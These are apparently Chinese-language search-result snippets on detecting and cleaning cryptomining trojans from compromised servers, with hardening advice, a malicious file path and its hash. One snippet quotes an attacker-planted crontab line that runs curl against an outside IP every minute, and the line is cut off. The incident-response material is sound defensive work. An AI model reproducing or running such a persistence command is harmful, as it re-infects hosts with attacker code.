1、查看流量圖發現問題 查看的時候網頁非常卡，有的時候甚至沒有響應 2、top動態查看進程 我馬上遠程登錄出問題的服務器，遠程操作很卡，網卡出去的流量非常大，通過top發現了一個異常的進程占用資源比較高，名字不仔細看還真以為是一個Web服務進程。 4、結束異常進程並繼續追蹤 ...

什么是挖礦木馬 挖礦木馬會占用CPU進行超頻運算，從而占用主機大量的CPU資源，嚴重影響服務器上的其他應用的正常運行。黑客為了得到更多的算力資源，一般都會對全網進行無差別掃描，同時利用SSH爆破和漏洞利用等手段攻擊主機。部分挖礦木馬還具備蠕蟲化的特點，在主機被成功入侵之后，挖礦木馬還會向內網滲透 ...

如果是雲服務器可以在‘雲監控-態勢與感知’中直接看到木馬文件相關進程name，id以及路徑如下：文件路徑: /opt/apache-tomcat-7.0.104/bin/shell1.elf惡意文件md5: 91cc7f105856a0e9eb6a29ef3d08d9ce進程id: 27504 ...

一般情況下，挖礦病毒都是自動掃描+自動掛馬生成的，並不會是有專人進行攻擊，所以也比較好清除，注意清除之后需要 check 有無后門。 最重要幾點（也可能是被hack的原因）：禁止 ROOT 用戶登陸，ROOT 不能使用弱密碼，FRP 需要配置，不能使用默認選項。 挖礦進程占用的 CPU 資源 ...

雲服務器ECS挖礦木馬病毒處理和解決方案 最近由於網絡環境安全意識低的原因，導致一些雲服務器ECS中了挖礦病毒的坑。 總結了一些解決挖礦病毒的一些思路。由於病毒更新速度快僅供參考。 1、查看cpu爆滿的進程 cpu占用率 100%, 用top 查看cpu100 2、殺死進程 ...

最近emr集群跑任務的時候總出現 task failed ，優化sql，調提交任務參數都沒解決，最后再我排查時候，發現一個從節點的cpu使用800% 經過一些列排查，發現是被注入木馬了， #被人種下的crontab#* * * * * curl -s http://158.69.133.17 ...

轉自 https://juejin.im/post/5aa0cc476fb9a028d82b5695最近打開服務變得很慢，然后 CPU，內存占用有達到了100%，打開網站都很慢，這個肯定很反常的，平時cpu不會達到那么高，因此netstat -ntlp 准備看看端口占用是不是有什么異常，有的會看 ...

背景 最近由於在弄springboot shiro的redis session共享的問題，所以在服務器上部署了redis，因為沒有太多的考慮所以沒有設置密碼。 等到第二天的時候，發現redis外網無法訪問內網可以。 查看端口綁定情況 netstat -antlp | grep 6379 ...